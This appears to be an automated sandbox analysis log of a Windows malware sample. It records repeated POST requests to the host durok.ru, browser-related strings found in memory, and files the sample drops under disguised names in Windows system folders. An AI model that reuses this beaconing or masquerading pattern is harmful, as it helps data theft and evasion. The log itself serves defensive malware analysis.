                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2536Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2100Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2116Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2544Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2544Expect: 100-continue
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: durok.ru
                    Source: unknownHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: services.exe, 00000010.00000002.2938691750.0000000002B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://durok.ru
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://durok.ru/
                    Source: services.exe, 00000010.00000002.2938691750.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002864000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.000000000283E000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002753000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php
                    Source: services.exe, 00000010.00000002.2938691750.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php$
                    Source: services.exe, 00000010.00000002.2938691750.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpQgKD
                    Source: services.exe, 00000010.00000002.2938691750.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpWlc5QmNt
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1718398029.000000000313B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: ZDtOzYsYYWKWEhNYzFc.exe, 0000001C.00000002.1961097952.0000000003269000.00000004.00000800.00020000.00000000.sdmp, ZDtOzYsYYWKWEhNYzFc.exe, 00000020.00000002.2123369585.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, ZDtOzYsYYWKWEhNYzFc.exe, 00000022.00000002.2287240262.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, ZDtOzYsYYWKWEhNYzFc.exe, 00000028.00000002.2704171763.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                    Source: services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: CegCJVAgFM.16.drString found in binary or memory: https://support.mozilla.org
                    Source: CegCJVAgFM.16.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: CegCJVAgFM.16.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: services.exe, 00000010.00000002.2975130306.00000000133E0000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000126BA000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: services.exe, 00000010.00000002.2975130306.0000000012696000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000133BB000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: services.exe, 00000010.00000002.2975130306.00000000133E0000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000126BA000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: services.exe, 00000010.00000002.2975130306.0000000012696000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000133BB000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: CegCJVAgFM.16.drString found in binary or memory: https://www.mozilla.org
                    Source: CegCJVAgFM.16.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: CegCJVAgFM.16.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: services.exe, 00000010.00000002.2975130306.00000000138A9000.00000004.00000800.00020000.00000000.sdmp, CegCJVAgFM.16.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: CegCJVAgFM.16.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: services.exe, 00000010.00000002.2975130306.00000000138A9000.00000004.00000800.00020000.00000000.sdmp, CegCJVAgFM.16.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\GameBarPresenceWriter\services.exeJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\GameBarPresenceWriter\services.exe\:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\GameBarPresenceWriter\c5b4cb5e9653ccJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe\:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\d766a8fd310fcaJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe\:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\twain_32\d766a8fd310fcaJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeCode function: 0_2_00007FFD9B761AC50_2_00007FFD9B761AC5
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeCode function: 0_2_00007FFD9B7613000_2_00007FFD9B761300
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B79FE6916_2_00007FFD9B79FE69
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC84E16_2_00007FFD9B7AC84E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC78216_2_00007FFD9B7AC782
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC73516_2_00007FFD9B7AC735
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC5A816_2_00007FFD9B7AC5A8
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC90C16_2_00007FFD9B7AC90C
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC91916_2_00007FFD9B7AC919
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC92616_2_00007FFD9B7AC926
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC88B16_2_00007FFD9B7AC88B
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AC87E16_2_00007FFD9B7AC87E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7D594F16_2_00007FFD9B7D594F
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B791AC516_2_00007FFD9B791AC5
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9BE6A04F16_2_00007FFD9BE6A04F
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9BE654D816_2_00007FFD9BE654D8
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AB0DD16_2_00007FFD9B7AB0DD
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7D594F19_2_00007FFD9B7D594F
